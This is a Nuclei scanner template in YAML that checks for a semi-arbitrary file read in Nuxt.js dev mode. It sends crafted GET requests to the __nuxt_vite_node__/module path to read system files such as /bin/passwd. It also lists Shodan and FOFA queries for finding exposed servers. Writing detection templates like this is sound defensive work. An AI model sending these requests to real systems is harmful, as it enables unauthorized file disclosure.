40 lines
1.1 KiB
YAML
40 lines
1.1 KiB
YAML
id: nuxt-js-semi-lfi
|
|
|
|
info:
|
|
name: Semi Arbitrary File Read in Dev Mode - Nuxt.js
|
|
author: DhiyaneshDK
|
|
severity: medium
|
|
reference:
|
|
- https://huntr.dev/bounties/7840cd32-af15-40cb-a148-7ef3dff4a0c2/
|
|
- https://bryces.io/blog/nuxt3
|
|
- https://twitter.com/fofabot/status/1669339995780558849
|
|
metadata:
|
|
verified: "true"
|
|
max-request: 2
|
|
shodan-query: html:"buildAssetsDir" "nuxt"
|
|
fofa-query: body="buildAssetsDir" && body="__nuxt"
|
|
tags: huntr,lfi,nuxtjs
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/__nuxt_vite_node__/module//bin/passwd"
|
|
- "{{BaseURL}}/__nuxt_vite_node__/module/C:/Windows/System32/calc.exe"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"plugin":'
|
|
- '"pluginCode":'
|
|
- '"id":'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/json"
|
|
|
|
# digest: 4a0a00473045022100a6c5d6f754da83f7ae30fd5bed0124f0bb7ee13b908158bfc3a4b31bab25aadb0220719a0dbf7647cd593363b7594ab6a313a95338c1bb87fe9f8dc41ae2ad0559af:922c64590222798bb761d5b6d8e72950
|